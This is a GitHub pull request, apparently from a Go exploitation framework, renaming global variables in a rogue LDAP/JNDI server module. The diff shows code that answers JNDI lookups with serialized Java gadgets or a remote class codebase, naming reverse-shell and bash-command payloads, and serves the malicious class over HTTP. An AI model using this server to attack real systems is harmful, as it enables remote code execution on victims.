Skip to content

Export ldapjndi global variables #460

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Oct 14, 2025
Merged

Export ldapjndi global variables #460

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
38 changes: 19 additions & 19 deletions java/ldapjndi/ldapjndi.go
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -41,13 +41,13 @@ const (
)

// a dirty way to pass the user's desired gadget to `handleBind`.
var globalSerializedPayload string
var GlobalSerializedPayload string
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Do we want the exported names to be Global*? Maybe we should name them something payload oriented?


// a dirty way to pass the user's desired name to `handleBind`.
var globalName string
var GlobalName string

// if the class is loaded from a secondary http server, this will be set.
var globalHTTPServer string
var GlobalHTTPServer string

// automatically accept.
func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
Expand All @@ -59,29 +59,29 @@ func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
// Accept the incoming request. Verify it is asking for the correct endpoint
// and then send the user's requested gadget'.
func handleSearch(writer ldap.ResponseWriter, msg *ldap.Message) {
if len(globalSerializedPayload) == 0 {
if len(GlobalSerializedPayload) == 0 {
output.PrintFrameworkError("A serialized payload was never configured!")
}

req := msg.GetSearchRequest()
dname := string(req.BaseObject())

if dname != globalName {
output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, globalName)
if dname != GlobalName {
output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, GlobalName)

return
}

// send search result
res := ldap.NewSearchResultEntry(dname)
if strings.HasPrefix(globalSerializedPayload, "\xca\xfe\xba\xbe") {
if strings.HasPrefix(GlobalSerializedPayload, "\xca\xfe\xba\xbe") {
res.AddAttribute("javaClassName", "foo")
res.AddAttribute("javaCodeBase", message.AttributeValue(globalHTTPServer))
res.AddAttribute("javaCodeBase", message.AttributeValue(GlobalHTTPServer))
res.AddAttribute("objectClass", "javaNamingReference")
res.AddAttribute("javaFactory", message.AttributeValue(globalName))
res.AddAttribute("javaFactory", message.AttributeValue(GlobalName))
} else {
res.AddAttribute("javaClassName", "java.lang.String")
res.AddAttribute("javaSerializedData", message.AttributeValue(globalSerializedPayload))
res.AddAttribute("javaSerializedData", message.AttributeValue(GlobalSerializedPayload))
}
writer.Write(res)

Expand All @@ -106,21 +106,21 @@ func CreateLDAPServer(name string) *ldap.Server {
server.Handle(routes)

// set a name so that we aren't tossing exploits at just anyone
globalName = name
GlobalName = name

return server
}

func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, command string) {
switch gadget {
case TomcatNashornReverseShell:
globalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
GlobalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
case TomcatGenericBash:
globalSerializedPayload = createTomcatGenericGadget(command)
GlobalSerializedPayload = createTomcatGenericGadget(command)
case GroovyGenericBash:
globalSerializedPayload = createGroovyGenericBash(command)
GlobalSerializedPayload = createGroovyGenericBash(command)
case BeanUtils194GenericBash:
globalSerializedPayload = createBeanUtils194GenericBash(command)
GlobalSerializedPayload = createBeanUtils194GenericBash(command)
case HTTPReverseShell:
fallthrough
default:
Expand All @@ -131,7 +131,7 @@ func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, co
func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost string, httpPort int) {
switch gadget {
case HTTPReverseShell:
globalSerializedPayload = createHTTPReverseShell(lhost, lport, globalName)
GlobalSerializedPayload = createHTTPReverseShell(lhost, lport, GlobalName)
case TomcatNashornReverseShell:
fallthrough
case TomcatGenericBash:
Expand All @@ -146,9 +146,9 @@ func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost strin
return
}

globalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
http.HandleFunc("/"+globalName+".class", func(w http.ResponseWriter, _ *http.Request) {
fmt.Fprint(w, globalSerializedPayload)
GlobalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
http.HandleFunc("/"+GlobalName+".class", func(w http.ResponseWriter, _ *http.Request) {
fmt.Fprint(w, GlobalSerializedPayload)
})

output.PrintfFrameworkStatus("Starting HTTP Server on %s:%d", httpHost, httpPort)
Expand Down